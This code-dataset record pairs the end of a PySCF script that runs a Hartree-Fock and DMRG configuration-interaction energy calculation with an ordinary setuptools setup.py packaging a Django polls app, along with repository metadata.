mf = scf.RHF(mol)
mf.kernel()
mc = dmrgscf.dmrgci.DMRGCI(mf, 8, 8)
mc.mo_coeff = mf.mo_coeff # sets orbitals with which to do DMRG calculation (just HF MO here)
emc = mc.kernel()[0]
print(emc)
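# This script evaluates a single bond length; to trace the dissociation curve
# one could loop r over a grid (a sketch, not part of the original):
#   for r in (0.5, 0.7, 0.9, 1.1, 1.3):
#       rebuild mol with the new spacing, rerun scf.RHF(mol) and DMRGCI,
#       and record emc for each point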
|
[
"gkc1000@gmail.com"
] |
gkc1000@gmail.com
|
214b3e555a47cc401125457c25dc90a26b14ef9c
|
cacc55e5a17ef2a8aee476235009f679fe959c30
|
/setup.py
|
fa4f10f172c0e2da2c2bdb697870a24fe31fdb8c
|
[] |
no_license
|
takers/Django-polls-vote-
|
b1379df8129de138987576d61fb73c0b1b186bea
|
aa12789c1960b40fb0af1d51a835057500ee2d5c
|
refs/heads/master
| 2020-03-29T14:33:45.240048
| 2014-01-02T06:20:28
| 2014-01-02T06:20:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,083
|
py
|
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='django-polls',
version='0.1',
packages=['polls'],
include_package_data=True,
license='BSD License', # example license
description='A simple Django app to conduct Web-based polls.',
long_description=README,
url='http://www..com/',
author='Gabriel Nweke',
author_email='gab4real2013@gmail.com',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License', # example license
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
|
[
"gab4real2013@gmail.com"
] |
gab4real2013@gmail.com
|